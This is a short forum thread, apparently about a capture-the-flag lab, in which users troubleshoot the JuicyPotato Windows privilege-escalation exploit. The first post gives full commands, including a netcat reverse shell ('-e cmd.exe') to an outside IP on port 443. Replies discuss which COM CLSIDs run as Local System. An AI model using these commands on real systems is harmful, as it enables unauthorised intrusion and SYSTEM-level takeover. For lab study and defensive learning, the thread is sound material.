So I have compiled JuicyPotato to work with x86,
but when I run
.\j.exe -l 1338 -p c:\tmp\nc.exe -a "-e cmd.exe 10.10.14.68 443" -t * -c "{A47979D2-C419-11D9-A5B4-001185AD2B89}"
I have no shell.
Even if I run
.\j.exe -p c:\windows\system32\cmd.exe -t * -l 1338 -c "{A47979D2-C419-11D9-A5B4-001185AD2B89}"
I stay in USER MODE, no privileges.
What might be the problem?
Log from JuicyPotato:
Testing {A47979D2-C419-11D9-A5B4-001185AD2B89} 1338
…
[+] authresult 0
{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\LOCAL SERVICE
The CLSID “{A47979D2-C419-11D9-A5B4-001185AD2B89}” you are trying to reflect is not running as local system but as local service.
Local service cannot create interactive windows out of Session 0. As far as I understand, you are running in Session != 0 as an interactive user, so you can’t see any window created on your Session. Try to change the CLSID and be sure you choose one that is running as Local System.
Try forcing the CreateProcessAsUser() call (-t u) and you will get a semi-working shell… but all this doesn’t make sense. Why should you use a CLSID which impersonates a local/network service?
@talboris did you get juicypotato32 to work on devel? I’m having issues with BITS not being started/running and I think that is why it doesn’t work for me.
I’ve also tried with the CLSID for ShellHWDetection but no dice.